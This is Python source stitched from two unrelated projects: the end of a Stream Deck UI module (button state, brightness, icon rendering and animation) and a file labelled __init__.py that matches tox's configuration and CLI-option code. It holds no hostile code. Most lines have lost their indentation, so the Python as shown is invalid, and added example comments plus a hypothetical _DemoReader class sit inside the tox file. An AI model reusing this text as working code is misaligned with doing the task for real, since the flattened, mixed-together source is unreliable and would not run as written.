return _button_state(deck_id, page, button).get("command", "")
def set_button_switch_page(deck_id: str, page: int, button: int, switch_page: int) -> None:
"""Sets the page switch associated with the button"""
if get_button_switch_page(deck_id, page, button) != switch_page:
if switch_page != 0:
_button_state(deck_id, page, button)["switch_page"] = switch_page
else:
del_none_key(deck_id, page, button, "switch_page")
_save_state()
def get_button_switch_page(deck_id: str, page: int, button: int) -> int:
"""Returns the page switch set for the specified button. 0 implies no page switch."""
return _button_state(deck_id, page, button).get("switch_page", 0)
def set_pages_name(deck_id: str, page: int, page_name: str) -> None:
"""Sets the page name for this page"""
if get_pages_name(deck_id, page) != page_name:
if "page_names" in _deck_state(deck_id):
if bool(page_name):
_deck_state(deck_id)["page_names"][str(page)] = page_name
else:
del _deck_state(deck_id)["page_names"][str(page)]
else:
_deck_state(deck_id)["page_names"] = {str(page): page_name}
_save_state()
def get_pages_name(deck_id: str, page: int) -> str:
"""Returns the page name set for the specified page. {} implies no page name."""
return _deck_state(deck_id).get("page_names", {str(page): f"Page {page+1}"}).get(str(page), f"Page {page+1}")
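# Illustrative example: if no custom name has been stored for page 0,
# get_pages_name(deck_id, 0) falls back to "Page 1".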
def get_page_length(deck_id: str) -> int:
"""return the number of page count"""
return _deck_state(deck_id).get("buttons", {}).__len__()
def del_none_key(deck_id: str, page: int, button: int, key: str) -> None:
"""Delete the state if it's not bool"""
del _button_state(deck_id, page, button)[key]
def set_button_keys(deck_id: str, page: int, button: int, keys: str) -> None:
"""Sets the keys associated with the button"""
if get_button_keys(deck_id, page, button) != keys:
if bool(keys):
_button_state(deck_id, page, button)["keys"] = keys
else:
del_none_key(deck_id, page, button, "keys")
_save_state()
def get_button_keys(deck_id: str, page: int, button: int) -> str:
"""Returns the keys set for the specified button"""
return _button_state(deck_id, page, button).get("keys", "")
def set_button_write(deck_id: str, page: int, button: int, write: str) -> None:
"""Sets the text meant to be written when button is pressed"""
if get_button_write(deck_id, page, button) != write:
if bool(write):
_button_state(deck_id, page, button)["write"] = write
else:
del_none_key(deck_id, page, button, "write")
_save_state()
def get_button_write(deck_id: str, page: int, button: int) -> str:
"""Returns the text to be produced when the specified button is pressed"""
return _button_state(deck_id, page, button).get("write", "")
def set_brightness(deck_id: str, brightness: int) -> None:
"""Sets the brightness for every button on the deck"""
if get_brightness(deck_id) != brightness:
decks[deck_id].set_brightness(brightness)
state.setdefault(deck_id, {})["brightness"] = brightness
_save_state()
def get_brightness(deck_id: str) -> int:
"""Gets the brightness that is set for the specified stream deck"""
return state.get(deck_id, {}).get("brightness", 100) # type: ignore
def get_brightness_dimmed(deck_id: str) -> int:
"""Gets the percentage value of the full brightness that is used when dimming the specified
stream deck"""
return state.get(deck_id, {}).get("brightness_dimmed", 0) # type: ignore
def set_brightness_dimmed(deck_id: str, brightness_dimmed: int) -> None:
"""Sets the percentage value that will be used for dimming the full brightness"""
state.setdefault(deck_id, {})["brightness_dimmed"] = brightness_dimmed
_save_state()
def change_brightness(deck_id: str, amount: int = 1) -> None:
"""Change the brightness of the deck by the specified amount"""
set_brightness(deck_id, max(min(get_brightness(deck_id) + amount, 100), 0))
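# Illustrative example: change_brightness(deck_id, -10) lowers the stored brightness
# by 10, clamped to the 0-100 range before being passed to set_brightness().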
def get_page(deck_id: str) -> int:
"""Gets the current page shown on the stream deck"""
return state.get(deck_id, {}).get("page", 0) # type: ignore
def set_page(deck_id: str, page: int, old_page: int) -> None:
"""Sets the current page shown on the stream deck"""
if get_page(deck_id) != page:
stop_animation()
state.setdefault(deck_id, {})["page"] = page
render()
        # drop empty button entries and remove the old page from state if nothing is left on it
to_delete = []
for button in _page_state(deck_id, old_page).items():
if not bool(button[1]):
to_delete.append(button[0])
        if len(_page_state(deck_id, old_page)) == len(to_delete):
del _deck_state(deck_id)["buttons"][old_page]
_save_state()
start_animation()
def render() -> None:
"""renders all decks"""
for deck_id, deck_state in state.items():
deck = decks.get(deck_id, None)
if not deck:
warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
continue
page = get_page(deck_id)
for button_id, button_settings in (
deck_state.get("buttons", {}).get(page, {}).items() # type: ignore
):
key = f"{deck_id}.{page}.{button_id}"
key_image = False
if key in image_cache:
image = image_cache[key]
elif os.path.isfile(ICON_DIR + key + ".png"):
image = _load_key_image(deck, key)
key_image = True
else:
image = _render_key_image(deck, key, **button_settings)
key_image = True
if key_image:
image_cache[key] = image[0]
global animation_buttons
                if deck_id not in animation_buttons:
                    animation_buttons[deck_id] = {}
                if page not in animation_buttons[deck_id]:
                    animation_buttons[deck_id][page] = {}
animation_buttons[deck_id][page][button_id] = itertools.cycle(image)
image = image_cache[key]
with streamdecks_lock:
deck.set_key_image(button_id, image)
def _load_key_image(deck, key: str):
"""load an individual rendered key image"""
if os.path.isfile(ICON_DIR + key + ".png"):
try:
rgba_icon = Image.open(ICON_DIR + key + ".png")
except (OSError, IOError) as icon_error:
print(f"Unable to load icon {key}.png with error {icon_error}")
rgba_icon = Image.new("RGBA", (300, 300))
else:
rgba_icon = Image.new("RGBA", (300, 300))
icon_frames = list()
frame_durations = list()
frame_timestamp = [0]
rgba_icon.seek(0)
frames_n = 1
while True:
try:
frame_durations.append(rgba_icon.info['duration'])
frame_timestamp.append(frame_timestamp[-1]+rgba_icon.info['duration'])
rgba_icon.seek(rgba_icon.tell() + 1)
frames_n += 1
except EOFError: # end of gif
break
except KeyError: # no gif
break
frames = ImageSequence.Iterator(rgba_icon)
del frame_timestamp[0]
frame_ms = 0
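    # The loop below resamples the animation onto a fixed 40 ms (25 fps) grid: each decoded
    # frame is appended repeatedly until the GIF's own timestamp for that frame is reached,
    # so the animation thread can play every icon back at a single frame rate.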
for frame_index in range(frames_n):
if bool(frame_timestamp) and frame_ms > frame_timestamp[frame_index]:
continue
frame = frames[frame_index].convert("RGBA")
frame_image = PILHelper.create_image(deck)
icon_width, icon_height = frame_image.width, frame_image.height
frame.thumbnail((icon_width, icon_height), Image.LANCZOS)
icon_pos = ((frame_image.width - frame.width) // 2, 0)
frame_image.paste(frame, icon_pos, frame)
native_frame_image = PILHelper.to_native_format(deck, frame_image)
if bool(frame_timestamp):
while frame_ms < frame_timestamp[frame_index]:
frame_ms += 40 # 40ms/frame (25 fps)
icon_frames.append(native_frame_image)
else:
icon_frames.append(native_frame_image)
return icon_frames
def _render_key_image(deck, key: str, icon: str = "", text: str = "", font: str = DEFAULT_FONT, **kwargs):
"""Renders an individual key image"""
    if icon:
        try:
            rgba_icon = Image.open(icon)
        except (OSError, IOError) as icon_error:
            # PIL could not open the file - assume it is an SVG and try to rasterize it,
            # falling back to a blank image if that fails as well.
            print(f"Unable to load icon {icon} with error {icon_error}")
            try:
                svg_code = open(icon).read()
                png = cairosvg.svg2png(svg_code, output_height=72, output_width=72)
                image_file = BytesIO(png)
                rgba_icon = Image.open(image_file)
            except (OSError, IOError) as svg_error:
                print(f"Unable to load icon {icon} with error {svg_error}")
                rgba_icon = Image.new("RGBA", (300, 300))
    else:
        rgba_icon = Image.new("RGBA", (300, 300))
icon_frames = list()
icon_frames_to_save = list()
frame_durations = list()
frame_timestamp = [0]
rgba_icon.seek(0)
frames_n = 1
while True:
try:
frame_durations.append(rgba_icon.info['duration'])
frame_timestamp.append(frame_timestamp[-1]+rgba_icon.info['duration'])
rgba_icon.seek(rgba_icon.tell() + 1)
frames_n += 1
except EOFError: # end of gif
break
except KeyError: # no gif
break
frames = ImageSequence.Iterator(rgba_icon)
del frame_timestamp[0]
frame_ms = 0
for frame_index in range(frames_n):
if bool(frame_timestamp) and frame_ms > frame_timestamp[frame_index]:
continue
frame = frames[frame_index].convert("RGBA")
frame_image = PILHelper.create_image(deck)
draw = ImageDraw.Draw(frame_image)
icon_width, icon_height = frame_image.width, frame_image.height
if text:
icon_height -= 20
frame.thumbnail((icon_width, icon_height), Image.LANCZOS)
icon_pos = ((frame_image.width - frame.width) // 2, 0)
frame_image.paste(frame, icon_pos, frame)
if text:
true_font = ImageFont.truetype(os.path.join(FONTS_PATH, font), 14)
label_w, label_h = draw.textsize(text, font=true_font)
if icon:
label_pos = ((frame_image.width - label_w) // 2, frame_image.height - 20)
else:
label_pos = ((frame_image.width - label_w) // 2, (frame_image.height // 2) - 7)
draw.text(label_pos, text=text, font=true_font, fill="white")
native_frame_image = PILHelper.to_native_format(deck, frame_image)
if bool(frame_timestamp):
while frame_ms < frame_timestamp[frame_index]:
frame_ms += 40 # 40ms/frame (25 fps)
icon_frames.append(native_frame_image)
icon_frames_to_save.append(frame_image)
else:
icon_frames.append(native_frame_image)
icon_frames_to_save.append(frame_image)
deck_id, page, button_id = key.split(".")
export_icon(deck_id, page, button_id, icon_frames_to_save)
return icon_frames
def start_animation() -> None:
global animation
animation = threading.Thread(target=animate)
animation.start()
stop_event.clear()
def stop_animation() -> None:
stop_event.set()
animation.join()
def animate() -> None:
frame_time = Fraction(1, 25)
next_frame = Fraction(time.monotonic())
# while not stop_event.is_set():
while True:
for deck_id, deck_state in state.items():
deck = decks.get(deck_id, None)
page = get_page(deck_id)
if not deck:
warn(f"{deck_id} has settings specified but is not seen. Likely unplugged!")
continue
try:
with deck:
for key, frames in animation_buttons[deck_id][page].items():
deck.set_key_image(key, next(frames))
except TransportError as err:
print("TransportError: {0}".format(err))
break
if stop_event.is_set():
return
next_frame += frame_time
sleep_interval = float(next_frame) - time.monotonic()
if sleep_interval >= 0:
time.sleep(sleep_interval)
animation = threading.Thread(target=animate)
stop_event = threading.Event()
if os.path.isfile(STATE_FILE):
_open_config(STATE_FILE)
|
__init__.py
|
from __future__ import print_function
import argparse
import itertools
import os
import random
import re
import shlex
import string
import sys
import traceback
import warnings
from collections import OrderedDict
from fnmatch import fnmatchcase
from subprocess import list2cmdline
from threading import Thread
import pluggy
import py
import six
import toml
from packaging import requirements
from packaging.utils import canonicalize_name
from packaging.version import Version
import tox
from tox.constants import INFO
from tox.exception import MissingDependency
from tox.interpreters import Interpreters, NoInterpreterInfo
from tox.reporter import (
REPORTER_TIMESTAMP_ON_ENV,
error,
update_default_reporter,
using,
verbosity1,
)
from tox.util.path import ensure_empty_dir
from tox.util.stdlib import importlib_metadata
from .parallel import ENV_VAR_KEY_PRIVATE as PARALLEL_ENV_VAR_KEY_PRIVATE
from .parallel import ENV_VAR_KEY_PUBLIC as PARALLEL_ENV_VAR_KEY_PUBLIC
from .parallel import add_parallel_config, add_parallel_flags
from .reporter import add_verbosity_commands
try:
from shlex import quote as shlex_quote
except ImportError:
from pipes import quote as shlex_quote
hookimpl = tox.hookimpl
# DEPRECATED - REMOVE - left for compatibility with plugins importing from here.
# Import hookimpl directly from tox instead.
WITHIN_PROVISION = os.environ.get(str("TOX_PROVISION")) == "1"
SUICIDE_TIMEOUT = 0.0
INTERRUPT_TIMEOUT = 0.3
TERMINATE_TIMEOUT = 0.2
_FACTOR_LINE_PATTERN = re.compile(r"^([\w{}\.!,-]+)\:\s+(.+)")
_ENVSTR_SPLIT_PATTERN = re.compile(r"((?:\{[^}]+\})+)|,")
_ENVSTR_EXPAND_PATTERN = re.compile(r"\{([^}]+)\}")
_WHITESPACE_PATTERN = re.compile(r"\s+")
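# Illustrative example (hypothetical ini content): _FACTOR_LINE_PATTERN matches a line like
#   "py37: pytest -q"
# capturing the factor expression "py37" and the command remainder "pytest -q", while
# _ENVSTR_EXPAND_PATTERN captures brace groups such as "{py27,py37}" in an envlist string
# like "{py27,py37}-django" so they can be expanded into separate environments.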
def get_plugin_manager(plugins=()):
# initialize plugin manager
import tox.venv
pm = pluggy.PluginManager("tox")
pm.add_hookspecs(tox.hookspecs)
pm.register(tox.config)
pm.register(tox.interpreters)
pm.register(tox.venv)
pm.register(tox.session)
from tox import package
pm.register(package)
pm.load_setuptools_entrypoints("tox")
for plugin in plugins:
pm.register(plugin)
pm.check_pending()
return pm
class Parser:
"""Command line and ini-parser control object."""
def __init__(self):
class HelpFormatter(argparse.ArgumentDefaultsHelpFormatter):
def __init__(self, prog):
super(HelpFormatter, self).__init__(prog, max_help_position=35, width=190)
self.argparser = argparse.ArgumentParser(
description="tox options",
add_help=False,
prog="tox",
formatter_class=HelpFormatter,
)
self._testenv_attr = []
def add_argument(self, *args, **kwargs):
"""add argument to command line parser. This takes the
same arguments that ``argparse.ArgumentParser.add_argument``.
"""
return self.argparser.add_argument(*args, **kwargs)
def add_testenv_attribute(self, name, type, help, default=None, postprocess=None):
"""add an ini-file variable for "testenv" section.
Types are specified as strings like "bool", "line-list", "string", "argv", "path",
"argvlist".
The ``postprocess`` function will be called for each testenv
like ``postprocess(testenv_config=testenv_config, value=value)``
where ``value`` is the value as read from the ini (or the default value)
and ``testenv_config`` is a :py:class:`tox.config.TestenvConfig` instance
which will receive all ini-variables as object attributes.
Any postprocess function must return a value which will then be set
as the final value in the testenv section.
"""
self._testenv_attr.append(VenvAttribute(name, type, default, help, postprocess))
def add_testenv_attribute_obj(self, obj):
"""add an ini-file variable as an object.
This works as the ``add_testenv_attribute`` function but expects
"name", "type", "help", and "postprocess" attributes on the object.
"""
assert hasattr(obj, "name")
assert hasattr(obj, "type")
assert hasattr(obj, "help")
assert hasattr(obj, "postprocess")
self._testenv_attr.append(obj)
def parse_cli(self, args, strict=False):
args, argv = self.argparser.parse_known_args(args)
if argv and (strict or WITHIN_PROVISION):
self.argparser.error("unrecognized arguments: {}".format(" ".join(argv)))
return args
def _format_help(self):
return self.argparser.format_help()
class VenvAttribute:
def __init__(self, name, type, default, help, postprocess):
self.name = name
self.type = type
self.default = default
self.help = help
self.postprocess = postprocess
class DepOption:
name = "deps"
type = "line-list"
help = "each line specifies a dependency in pip/setuptools format."
default = ()
def postprocess(self, testenv_config, value):
deps = []
config = testenv_config.config
for depline in value:
m = re.match(r":(\w+):\s*(\S+)", depline)
if m:
iname, name = m.groups()
ixserver = config.indexserver[iname]
else:
name = depline.strip()
ixserver = None
# we need to process options, in case they contain a space,
# as the subprocess call to pip install will otherwise fail.
# in case of a short option, we remove the space
for option in tox.PIP.INSTALL_SHORT_OPTIONS_ARGUMENT:
if name.startswith(option):
name = "{}{}".format(option, name[len(option) :].strip())
# in case of a long option, we add an equal sign
for option in tox.PIP.INSTALL_LONG_OPTIONS_ARGUMENT:
name_start = "{} ".format(option)
if name.startswith(name_start):
name = "{}={}".format(option, name[len(option) :].strip())
name = self._cut_off_dep_comment(name)
name = self._replace_forced_dep(name, config)
deps.append(DepConfig(name, ixserver))
return deps
def _replace_forced_dep(self, name, config):
"""Override given dependency config name. Take ``--force-dep-version`` option into account.
:param name: dep config, for example ["pkg==1.0", "other==2.0"].
:param config: ``Config`` instance
:return: the new dependency that should be used for virtual environments
"""
if not config.option.force_dep:
return name
for forced_dep in config.option.force_dep:
if self._is_same_dep(forced_dep, name):
return forced_dep
return name
@staticmethod
def _cut_off_dep_comment(name):
return re.sub(r"\s+#.*", "", name).strip()
@classmethod
def _is_same_dep(cls, dep1, dep2):
"""Definitions are the same if they refer to the same package, even if versions differ."""
dep1_name = canonicalize_name(requirements.Requirement(dep1).name)
try:
dep2_name = canonicalize_name(requirements.Requirement(dep2).name)
except requirements.InvalidRequirement:
# we couldn't parse a version, probably a URL
return False
return dep1_name == dep2_name
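# Illustrative examples for DepOption._is_same_dep(): ("pytest==5.0", "pytest>=4.0") compare
# equal because both canonicalize to the name "pytest", while ("pytest==5.0", "coverage")
# do not; a second argument that cannot be parsed as a requirement (e.g. a plain URL)
# yields False.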
class PosargsOption:
name = "args_are_paths"
type = "bool"
default = True
help = "treat positional args in commands as paths"
def postprocess(self, testenv_config, value):
config = testenv_config.config
args = config.option.args
if args:
if value:
args = []
for arg in config.option.args:
if arg and not os.path.isabs(arg):
origpath = os.path.join(config.invocationcwd.strpath, arg)
if os.path.exists(origpath):
arg = os.path.relpath(origpath, testenv_config.changedir.strpath)
args.append(arg)
testenv_config._reader.addsubstitutions(args)
return value
class InstallcmdOption:
name = "install_command"
type = "argv_install_command"
default = r"python -m pip install \{opts\} \{packages\}"
help = "install command for dependencies and package under test."
def postprocess(self, testenv_config, value):
if "{packages}" not in value:
raise tox.exception.ConfigError(
"'install_command' must contain '{packages}' substitution",
)
return value
def parseconfig(args, plugins=()):
"""Parse the configuration file and create a Config object.
:param plugins:
:param list[str] args: list of arguments.
:rtype: :class:`Config`
:raise SystemExit: toxinit file is not found
"""
pm = get_plugin_manager(plugins)
config, option = parse_cli(args, pm)
update_default_reporter(config.option.quiet_level, config.option.verbose_level)
for config_file in propose_configs(option.configfile):
config_type = config_file.basename
content = None
if config_type == "pyproject.toml":
toml_content = get_py_project_toml(config_file)
try:
content = toml_content["tool"]["tox"]["legacy_tox_ini"]
except KeyError:
continue
try:
ParseIni(config, config_file, content)
except SkipThisIni:
continue
pm.hook.tox_configure(config=config) # post process config object
break
else:
parser = Parser()
pm.hook.tox_addoption(parser=parser)
        # if no tox config file, now we need to do a strict argument evaluation
        # raise on unknown args
parser.parse_cli(args, strict=True)
if option.help or option.helpini:
return config
if option.devenv:
# To load defaults, we parse an empty config
ParseIni(config, py.path.local(), "")
pm.hook.tox_configure(config=config)
return config
msg = "tox config file (either {}) not found"
candidates = ", ".join(INFO.CONFIG_CANDIDATES)
feedback(msg.format(candidates), sysexit=not (option.help or option.helpini))
return config
def get_py_project_toml(path):
with open(str(path)) as file_handler:
config_data = toml.load(file_handler)
return config_data
def propose_configs(cli_config_file):
from_folder = py.path.local()
if cli_config_file is not None:
if os.path.isfile(cli_config_file):
yield py.path.local(cli_config_file)
return
if os.path.isdir(cli_config_file):
from_folder = py.path.local(cli_config_file)
else:
print(
"ERROR: {} is neither file or directory".format(cli_config_file),
file=sys.stderr,
)
return
for basename in INFO.CONFIG_CANDIDATES:
if from_folder.join(basename).isfile():
yield from_folder.join(basename)
for path in from_folder.parts(reverse=True):
ini_path = path.join(basename)
if ini_path.check():
yield ini_path
def parse_cli(args, pm):
parser = Parser()
pm.hook.tox_addoption(parser=parser)
option = parser.parse_cli(args)
if option.version:
print(get_version_info(pm))
raise SystemExit(0)
interpreters = Interpreters(hook=pm.hook)
config = Config(
pluginmanager=pm,
option=option,
interpreters=interpreters,
parser=parser,
args=args,
)
return config, option
def feedback(msg, sysexit=False):
print("ERROR: {}".format(msg), file=sys.stderr)
if sysexit:
raise SystemExit(1)
def get_version_info(pm):
out = ["{} imported from {}".format(tox.__version__, tox.__file__)]
plugin_dist_info = pm.list_plugin_distinfo()
if plugin_dist_info:
out.append("registered plugins:")
for mod, egg_info in plugin_dist_info:
source = getattr(mod, "__file__", repr(mod))
out.append(" {}-{} at {}".format(egg_info.project_name, egg_info.version, source))
return "\n".join(out)
class SetenvDict(object):
_DUMMY = object()
def __init__(self, definitions, reader):
self.definitions = definitions
self.reader = reader
self.resolved = {}
self._lookupstack = []
def __repr__(self):
return "{}: {}".format(self.__class__.__name__, self.definitions)
def __contains__(self, name):
return name in self.definitions
def get(self, name, default=None):
try:
return self.resolved[name]
except KeyError:
try:
if name in self._lookupstack:
raise KeyError(name)
val = self.definitions[name]
except KeyError:
return os.environ.get(name, default)
self._lookupstack.append(name)
try:
self.resolved[name] = res = self.reader._replace(val, name="setenv")
finally:
self._lookupstack.pop()
return res
def __getitem__(self, name):
x = self.get(name, self._DUMMY)
if x is self._DUMMY:
raise KeyError(name)
return x
def keys(self):
return self.definitions.keys()
def __setitem__(self, name, value):
self.definitions[name] = value
self.resolved[name] = value
def items(self):
return ((name, self[name]) for name in self.definitions)
def export(self):
# post-process items to avoid internal syntax/semantics
# such as {} being escaped using \{\}, suitable for use with
# os.environ .
return {
name: Replacer._unescape(value)
for name, value in self.items()
if value is not self._DUMMY
}
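# Minimal sketch (not part of tox): SetenvDict resolves values lazily through its
# reader and falls back to os.environ for names it does not define. _DemoReader
# below is a hypothetical stand-in for SectionReader, just to show the lookup order.
class _DemoReader:
    def _replace(self, value, name=None):
        return value.replace("{homedir}", "/home/demo")
# env = SetenvDict({"PIP_CACHE_DIR": "{homedir}/.cache/pip"}, reader=_DemoReader())
# env["PIP_CACHE_DIR"]  -> "/home/demo/.cache/pip"  (resolved via the reader)
# env.get("PATH")       -> taken from os.environ, since it is not defined here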
@tox.hookimpl
def tox_addoption(parser):
parser.add_argument(
"--version",
action="store_true",
help="report version information to stdout.",
)
parser.add_argument("-h", "--help", action="store_true", help="show help about options")
parser.add_argument(
"--help-ini",
"--hi",
action="store_true",
dest="helpini",
help="show help about ini-names",
)
add_verbosity_commands(parser)
parser.add_argument(
"--showconfig",
action="store_true",
help="show live configuration (by default all env, with -l only default targets,"
" specific via TOXENV/-e)",
)
parser.add_argument(
"-l",
"--listenvs",
action="store_true",
help="show list of test environments (with description if verbose)",
)
parser.add_argument(
"-a",
"--listenvs-all",
action="store_true",
help="show list of all defined environments (with description if verbose)",
)
parser.add_argument(
"-c",
dest="configfile",
help="config file name or directory with 'tox.ini' file.",
)
parser.add_argument(
"-e",
action="append",
dest="env",
metavar="envlist",
help="work against specified environments (ALL selects all).",
)
parser.add_argument(
"--devenv",
metavar="ENVDIR",
help=(
"sets up a development environment at ENVDIR based on the env's tox "
"configuration specified by `-e` (-e defaults to py)."
),
)
parser.add_argument("--notest", action="store_true", help="skip invoking test commands.")
parser.add_argument(
"--sdistonly",
action="store_true",
help="only perform the sdist packaging activity.",
)
parser.add_argument(
"--skip-pkg-install",
action="store_true",
help="skip package installation for this run",
)
add_parallel_flags(parser)
parser.add_argument(
"--parallel--safe-build",
action="store_true",
dest="parallel_safe_build",
help="(deprecated) ensure two tox builds can run in parallel "
"(uses a lock file in the tox workdir with .lock extension)",
)
parser.add_argument(
"--installpkg",
metavar="PATH",
help="use specified package for installation into venv, instead of creating an sdist.",
)
parser.add_argument(
"--develop",
action="store_true",
help="install package in the venv using 'setup.py develop' via 'pip -e .'",
)
parser.add_argument(
"-i",
"--index-url",
action="append",
dest="indexurl",
metavar="URL",
help="set indexserver url (if URL is of form name=url set the "
"url for the 'name' indexserver, specifically)",
)
parser.add_argument(
"--pre",
action="store_true",
help="install pre-releases and development versions of dependencies. "
"This will pass the --pre option to install_command "
"(pip by default).",
)
parser.add_argument(
"-r",
"--recreate",
action="store_true",
help="force recreation of virtual environments",
)
parser.add_argument(
"--result-json",
dest="resultjson",
metavar="PATH",
help="write a json file with detailed information "
"about all commands and results involved.",
)
parser.add_argument(
"--discover",
dest="discover",
nargs="+",
metavar="PATH",
help="for python discovery first try the python executables under these paths",
default=[],
)
# We choose 1 to 4294967295 because it is the range of PYTHONHASHSEED.
parser.add_argument(
"--hashseed",
metavar="SEED",
help="set PYTHONHASHSEED to SEED before running commands. "
"Defaults to a random integer in the range [1, 4294967295] "
"([1, 1024] on Windows). "
"Passing 'noset' suppresses this behavior.",
)
parser.add_argument(
"--force-dep",
action="append",
metavar="REQ",
help="Forces a certain version of one of the dependencies "
"when configuring the virtual environment. REQ Examples "
"'pytest<2.7' or 'django>=1.6'.",
)
parser.add_argument(
"--sitepackages",
action="store_true",
help="override sitepackages setting to True in all envs",
)
parser.add_argument(
"--alwayscopy",
action="store_true",
help="override alwayscopy setting to True in all envs",
)
cli_skip_missing_interpreter(parser)
parser.add_argument("--workdir", metavar="PATH", help="tox working directory")
parser.add_argument(
"args",
nargs="*",
help="additional arguments available to command positional substitution",
)
def _set_envdir_from_devenv(testenv_config, value):
if testenv_config.config.option.devenv is not None:
return py.path.local(testenv_config.config.option.devenv)
else:
return value
parser.add_testenv_attribute(
name="envdir",
type="path",
default="{toxworkdir}/{envname}",
help="set venv directory -- be very careful when changing this as tox "
"will remove this directory when recreating an environment",
postprocess=_set_envdir_from_devenv,
)
# add various core venv interpreter attributes
def setenv(testenv_config, value):
setenv = value
config = testenv_config.config
if "PYTHONHASHSEED" not in setenv and config.hashseed is not None:
setenv["PYTHONHASHSEED"] = config.hashseed
setenv["TOX_ENV_NAME"] = str(testenv_config.envname)
setenv["TOX_ENV_DIR"] = str(testenv_config.envdir)
return setenv
parser.add_testenv_attribute(
name="setenv",
type="dict_setenv",
postprocess=setenv,
help="list of X=Y lines with environment variable settings",
)
def basepython_default(testenv_config, value):
"""either user set or proposed from the factor name
in both cases we check that the factor name implied python version and the resolved
python interpreter version match up; if they don't we warn, unless ignore base
python conflict is set in which case the factor name implied version if forced
"""
for factor in testenv_config.factors:
match = tox.PYTHON.PY_FACTORS_RE.match(factor)
if match:
base_exe = {"py": "python"}.get(match.group(1), match.group(1))
version_s = match.group(2)
if not version_s:
version_info = ()
elif len(version_s) == 1:
version_info = (version_s,)
else:
version_info = (version_s[0], version_s[1:])
implied_version = ".".join(version_info)
implied_python = "{}{}".format(base_exe, implied_version)
break
else:
implied_python, version_info, implied_version = None, (), ""
if testenv_config.config.ignore_basepython_conflict and implied_python is not None:
return implied_python
proposed_python = (implied_python or sys.executable) if value is None else str(value)
if implied_python is not None and implied_python != proposed_python:
testenv_config.basepython = proposed_python
python_info_for_proposed = testenv_config.python_info
if not isinstance(python_info_for_proposed, NoInterpreterInfo):
proposed_version = ".".join(
str(x) for x in python_info_for_proposed.version_info[: len(version_info)]
)
if proposed_version != implied_version:
# TODO(stephenfin): Raise an exception here in tox 4.0
warnings.warn(
"conflicting basepython version (set {}, should be {}) for env '{}';"
"resolve conflict or set ignore_basepython_conflict".format(
proposed_version,
implied_version,
testenv_config.envname,
),
)
return proposed_python
parser.add_testenv_attribute(
name="basepython",
type="basepython",
default=None,
postprocess=basepython_default,
help="executable name or path of interpreter used to create a virtual test environment.",
)
def merge_description(testenv_config, value):
"""the reader by default joins generated description with new line,
replace new line with space"""
return value.replace("\n", " ")
parser.add_testenv_attribute(
name="description",
type="string",
default="",
postprocess=merge_description,
help="short description of this environment",
)
parser.add_testenv_attribute(
name="envtmpdir",
type="path",
default="{envdir}/tmp",
help="venv temporary directory",
)
parser.add_testenv_attribute(
name="envlogdir",
type="path",
default="{envdir}/log",
help="venv log directory",
)
parser.add_testenv_attribute(
name="downloadcache",
type="string",
default=None,
help="(ignored) has no effect anymore, pip-8 uses local caching by default",
)
parser.add_testenv_attribute(
name="changedir",
type="path",
default="{toxinidir}",
help="directory to change to when running commands",
)
parser.add_testenv_attribute_obj(PosargsOption())
def skip_install_default(testenv_config, value):
return value is True or testenv_config.config.option.skip_pkg_install is True
parser.add_testenv_attribute(
name="skip_install",
type="bool",
default=False,
postprocess=skip_install_default,
help="Do not install the current package. This can be used when you need the virtualenv "
"management but do not want to install the current package",
)
parser.add_testenv_attribute(
name="ignore_errors",
type="bool",
default=False,
help="if set to True all commands will be executed irrespective of their result error "
"status.",
)
def recreate(testenv_config, value):
if testenv_config.config.option.recreate:
return True
return value
parser.add_testenv_attribute(
name="recreate",
type="bool",
default=False,
postprocess=recreate,
help="always recreate this test environment.",
)
def passenv(testenv_config, value):
# Flatten the list to deal with space-separated values.
value = list(itertools.chain.from_iterable([x.split(" ") for x in value]))
passenv = {
"CURL_CA_BUNDLE",
"LANG",
"LANGUAGE",
"LD_LIBRARY_PATH",
"PATH",
"PIP_INDEX_URL",
"PIP_EXTRA_INDEX_URL",
"REQUESTS_CA_BUNDLE",
"SSL_CERT_FILE",
"TOX_WORK_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"NO_PROXY",
str(REPORTER_TIMESTAMP_ON_ENV),
str(PARALLEL_ENV_VAR_KEY_PUBLIC),
}
# read in global passenv settings
p = os.environ.get("TOX_TESTENV_PASSENV", None)
if p is not None:
env_values = [x for x in p.split() if x]
value.extend(env_values)
# we ensure that tmp directory settings are passed on
# we could also set it to the per-venv "envtmpdir"
# but this leads to very long paths when run with jenkins
# so we just pass it on by default for now.
if tox.INFO.IS_WIN:
passenv.add("SYSTEMDRIVE") # needed for pip6
passenv.add("SYSTEMROOT") # needed for python's crypto module
passenv.add("PATHEXT") # needed for discovering executables
passenv.add("COMSPEC") # needed for distutils cygwincompiler
passenv.add("TEMP")
passenv.add("TMP")
# for `multiprocessing.cpu_count()` on Windows (prior to Python 3.4).
passenv.add("NUMBER_OF_PROCESSORS")
passenv.add("PROCESSOR_ARCHITECTURE") # platform.machine()
passenv.add("USERPROFILE") # needed for `os.path.expanduser()`
passenv.add("MSYSTEM") # fixes #429
else:
passenv.add("TMPDIR")
for spec in value:
for name in os.environ:
if fnmatchcase(name.upper(), spec.upper()):
passenv.add(name)
return passenv
parser.add_testenv_attribute(
name="passenv",
type="line-list",
postprocess=passenv,
help="environment variables needed during executing test commands (taken from invocation "
"environment). Note that tox always passes through some basic environment variables "
"which are needed for basic functioning of the Python system. See --showconfig for the "
"eventual passenv setting.",
)
parser.add_testenv_attribute(
name="whitelist_externals",
type="line-list",
help="DEPRECATED: use allowlist_externals",
)
parser.add_testenv_attribute(
name="allowlist_externals",
type="line-list",
help="each lines specifies a path or basename for which tox will not warn "
"about it coming from outside the test environment.",
)
parser.add_testenv_attribute(
name="platform",
type="string",
default=".*",
help="regular expression which must match against ``sys.platform``. "
"otherwise testenv will be skipped.",
)
def sitepackages(testenv_config, value):
return testenv_config.config.option.sitepackages or value
def alwayscopy(testenv_config, value):
return testenv_config.config.option.alwayscopy or value
parser.add_testenv_attribute(
name="sitepackages",
type="bool",
default=False,
postprocess=sitepackages,
help="Set to ``True`` if you want to create virtual environments that also "
"have access to globally installed packages.",
)
parser.add_testenv_attribute(
"download",
type="bool",
default=False,
help="download the latest pip, setuptools and wheel when creating the virtual"
"environment (default is to use the one bundled in virtualenv)",
)
parser.add_testenv_attribute(
name="alwayscopy",
type="bool",
default=False,
postprocess=alwayscopy,
help="Set to ``True`` if you want virtualenv to always copy files rather "
"than symlinking.",
)
def pip_pre(testenv_config, value):
return testenv_config.config.option.pre or value
parser.add_testenv_attribute(
name="pip_pre",
type="bool",
default=False,
postprocess=pip_pre,
help="If ``True``, adds ``--pre`` to the ``opts`` passed to the install command. ",
)
